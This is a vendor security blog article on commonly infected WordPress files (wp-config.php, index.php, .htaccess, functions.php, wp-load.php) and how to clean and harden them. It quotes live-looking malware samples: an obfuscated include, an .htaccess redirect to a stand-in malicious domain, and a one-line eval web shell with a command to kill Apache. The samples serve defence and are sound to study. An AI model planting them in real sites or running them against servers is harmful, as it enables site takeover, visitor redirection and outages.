How to Scan & Fix Infected WordPress Files?


WordPress has made creating websites incredibly simple, allowing people and businesses of all sizes to have an online presence.

Taking care of your WordPress website’s security is critical while hosting it. The last thing you want to discover when you get up in the morning is that your website has been hacked, and all of your development and SEO efforts have gone to waste with you being completely unaware of it.

Hackers frequently target WordPress, as well as its themes and plugins, due to its popularity. If they discover a flaw in one plugin, they will be able to exploit practically all of the websites that use that plugin.

Consider the recent vulnerability in the Contact Form 7 plugin. After the vulnerability was discovered, it is believed that over 5 million websites utilising the Contact Form WordPress plugin were left susceptible. Because of the weaknesses in the plugins, attackers were able to upload files of any sort, bypassing any restrictions put on the types of files that may be uploaded on a website. Additionally, it permitted an attacker to inject malicious content such as web shells into sites that use the Contact Form 7 plugin version 5.3.1 or have file upload enabled on the forms.

Similarly, the ‘Slider Revolution’ plugin contained an LFI vulnerability that allowed hackers to download wp-config.php from susceptible WordPress sites. This resulted in the disclosure of database credentials, encryption keys, and other critical website setup information. The wp-config.php hack was coined as a result of this.

We’ll go through all of the crucial files and locations on your WordPress site that could have been hacked or infected with malware in this article.

Commonly Hacked WordPress Files

WordPress wp-config.php Hack

The wp-config.php file is essential for any WordPress installation. It is the site’s configuration file, and it serves as a link between the WP file system and the database. The wp-config.php file contains private data such as:

  • Database host
  • Username, password, & port number
  • Database name
  • Security keys for WordPress
  • Database table prefix

It is a favourite target for hackers due to its sensitive nature. Duplicator, a WordPress plugin, was discovered to have a significant issue last year. Hackers were able to download the wp-config file using the Unauthenticated Arbitrary File Download vulnerability.

Once the database login details are obtained using the wp-config.php attack, hackers attempt to access to the database and create phoney WP admin accounts for themselves. This grants them complete access to a website as well as a database. The hacker has access to sensitive data such as user passwords, email addresses, files, photos, WooCommerce transaction details, and so on. They may also instal programmes like the Filesman backdoor to maintain access to your WordPress site.

WordPress index.php Hacked

Every WordPress site’s index.php file serves as the main entry point. Hackers inject harmful code that affects your entire website because this runs with every page on your site.

For instance, the pub2srv malware & Favicon malware hack target index.php filesResearchers at Astra Security were monitoring this large spread malware redirection campaign, and saw that malicious code such as @include "\x2f/sgb\x2ffavi\x63on_5\x34e6ed\x2eico"; and the code in the screenshot below was added to the index.php files:

wp index php hack

Some malware campaigns rename the index.php file to index.php.bak, resulting in the website crashing and not loading at all.

Visitors to a website may see unusual popups, advertising, or even be led to other spammy sites as a result of harmful code in the index.php file. Compare the contents of this file to the original one released by WordPress to detect a hack.

WordPress .htaccess File Hacked

The.htaccess file, which is frequently found in the root directory of your WordPress website, aids in the configuration of server settings to meet the needs of the website. This is a common problem with Apache servers. The.htaccess file is a very powerful component for controlling the performance and behaviour of your web server. It can also be used to manage your website’s security. The.htaccess file is commonly used for the following purposes:

  • Restrict access to specific site directories; set the site’s maximum memory consumption; and create redirects.
  • Force HTTPS
  • Organize Caching
  • Defend yourself against a few script injection attempts.
  • Limit the file sizes that can be uploaded.
  • Bots shouldn’t be able to find usernames.
  • Block image hotlinking
  • Force automatic downloads of files
  • Manage file extensions

When under assault, however, these functionalities can be exploited to collect clicks for the attacker. The.htaccess file is frequently injected with malicious code in order to redirect users. It is sometimes used to show spam to users. Take a look at the example code below:

RewriteEngine On
 RewriteOptions inherit
 RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .**$ [NC,OR]
 RewriteCond %{HTTP_REFERER} .**$ [NC]
 RewriteRule .* http://MaliciousDomain.tld/bad.php?t=3 [R,L]

The malicious code in the last line is redirecting the user traffic from the site.  As a result, the users are redirected to http://MaliciousDomain.tld. Then, it tries to load the bad.php script. If you notice unusual redirect from your site, it is possible due to the .htaccess file hack. However, if you don’t find the file, or if it’s empty – do not panic as this file is not mandatory (unless you are using pretty URLs in WordPress).

WordPress footer.php & header.php (WordPress Theme Files Hacked)

Each WordPress theme has a footer.php and header.php file that contains the code for the site’s footer and header. This section contains scripts and widgets that are used throughout the website. For instance, at the bottom of your website, you might have a share widget or social networking widget. It might also just be copyright information, credits, and so on.

As a result, these two files are critical files that attackers may target. As was the case with the digestcolect[.com] Redirect Malware, it is frequently exploited for malware redirects and presenting spam content.

We decrypted part of data and discovered that hackers were using browser cookies to identify users and provide malicious adverts to them, among other things.

Furthermore, the attackers injected JavaScript code into all files with the.js extension in another case. It is often tough to clear such hacks due of the huge size infestation.
functions.php is a PHP file used by WordPress. Hacked

The functions file in the theme folder works similarly to a plugin. That is, it can be used to enhance the operation and features of a WordPress site. The file functions.php can be used for a variety of things.

  • Using WordPress to call events and functions
  • To invoke PHP functions that are native to the language.
  • Alternatively, you can create your own functions.

Every theme comes with a functions.php file, but it’s vital to remember that only one functions.php file is run at any one time — the one in the active theme. As a result, attackers in the Wp-VCD Backdoor Hack actively targeted the functions.php files. This spyware infiltrated the site, creating new admins and injecting spam pages such as Pharma and Japanese SEO spam.

<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>

This file includes the class.theme-modules.php file, as shown in the code above. This file is then used to inject malware into your site’s other themes (even if they are disabled). As a result, new users and backdoors are created. Even after the file was cleaned away, attackers were able to access the site.

WordPress wp-load.php Hacked

Every WordPress site needs a file called wp-load.php. The wp-load.php file aids in the initialization of the WordPress environment and allows plugins to access native WP core functionality. As witnessed in the instance of the China Chopper Web shell virus, many of the malware types infiltrate WordPress sites by producing malicious wp-load files. Creating files like wp-load-eFtAh.php on the server was a common practise. Because the name is similar to the original file’s name, you might not have seen it while logged in to FTP. These files might include codes like:

<?php /*5b7bdc250b181*/ ?><?php @eval($_POST['pass']);?>

This code allows the attacker to run any PHP code on the site which is sent by the hackers in the pass parameter. Using this backdoor, harmful commands could be executed. For instance, the command — http://yoursite/your.php?pass=system("killall -9 apache"); could kill the webserver processes. This can shut down the entire server. Don’t judge this code by its length – it is dangerous enough to control your server remotely.

Flood of class-wp-cache.php Files on the Server

We’ve seen cPanel and the entire web server obtain dozens or even thousands of class-wp-cache.php files in one of the latest breaches. These malicious files have infected every folder on the website, including the core files. The most common origin of this infection is a flaw in the website coding that allows hackers access.

How to Perform a WordPress Files Cleanup & Secure them

Cleaning files

To begin, look at the reasons of assaults such as the wp-config.php hack. The malicious/gibberish code should then be removed. Second, restore the affected files from any available backups. If the backup isn’t available, the original WordPress files can be found on GitHub. Before making any changes, make sure you have a backup of the files. Any error made during the code removal process has the potential to cause your site to crash.

Securing the site using plugins

Hackers frequently modify essential CMS files as a result of such attacks. Check to see if any of your core WordPress files have been changed. Customers of Astra Security already have this feature and are automatically notified if any changes are detected.

You’ll need to scan your site using a Malware Scanning service like Astra Security once you’ve examined the modifications in core system files to find files with malicious information. Such technologies provide a comprehensive scan report that includes malware files, malicious links, and the reasons for the hack, among other things.

Hide sensitive files

As we saw with the wp-config.php hack in this post, exposing files to curious eyes can reveal important information. As a result, hiding these files on the server becomes necessary. The.htaccess file can aid in the protection of certain files.

You can create an.htaccess file in the wp-content/uploads folder and add the following code to it to prohibit anyone from accessing any PHP files in that location:

# Kill PHP Execution
<Files ~ ".ph(?:p[345]?|t|tml)$">
deny from all

To hide sensitive files in the wp-includes folder, add the following code to the .htaccess file in the root of your site:

# Block wp-includes folder and files
 <IfModule mod_rewrite.c>
 RewriteEngine On
 RewriteBase /
 RewriteRule ^wp-admin/includes/ - [F,L]
 RewriteRule !^wp-includes/ - [S=3]
 RewriteRule ^wp-includes/[^/]+\.php$ - [F,L]
 RewriteRule ^wp-includes/js/tinymce/langs/.+\.php - [F,L]
 RewriteRule ^wp-includes/theme-compat/ - [F,L]

You can alternatively just instal the WP Hardening Plugin and skip the rest of the steps. With the click of a button, this plugin hides important files like wp-contents, wp-uploads, and others. WP-Hardening helps secure various additional crucial security areas on your website, making it difficult for attackers to find and exploit sensitive information.

Updating WordPress

Keep your WordPress installation, plugins, and themes up to current at all times. By executing an updated installation, you can close a lot of the holes. Only use well-known plugins and themes. Avoid themes that are poorly coded or nulled. This would protect against assaults like the wp-config.php hack.

Use a WordPress Firewall

A firewall can help secure your website significantly. A firewall can keep an eye on your site’s incoming traffic and take precautions to prevent infection. It’s capable of thwarting attempts like the wp-config.php hack. There are a variety of low-cost firewall options on the market today. The one at Astra Security is adaptable and appropriate for your requirements.

SQL injection, code injection, XSS, CSRF, and 100+ other cyber threats are all blocked in real time by the Astra firewall. It also monitors your website automatically and on a regular basis, detecting and blocking strange and false logins to your instance.

WordPress Security Audit or Pen testing

Attackers are continually on the lookout for exploitable vulnerabilities on WordPress websites, as it is the most popular CMS in use and hence a source of significant security risks. Pen-testing a WordPress site has thus become critical in order to maintain it safe from attacks.

Penetration testing is a simulated attack on a web application, network, or computer system to assess its security and identify any weaknesses it may have before an attacker attacks it, thereby assisting in its protection. One of the various simulated attacks carried out while Pen-Testing a WordPress site would be to check for a Directory Listing vulnerability, which indexes sensitive directories such as wp-includes, wp-index.php, wp-config.php, wp-admin, wp-load.php, wp-content, and so on, and could thus provide sensitive information to an attacker.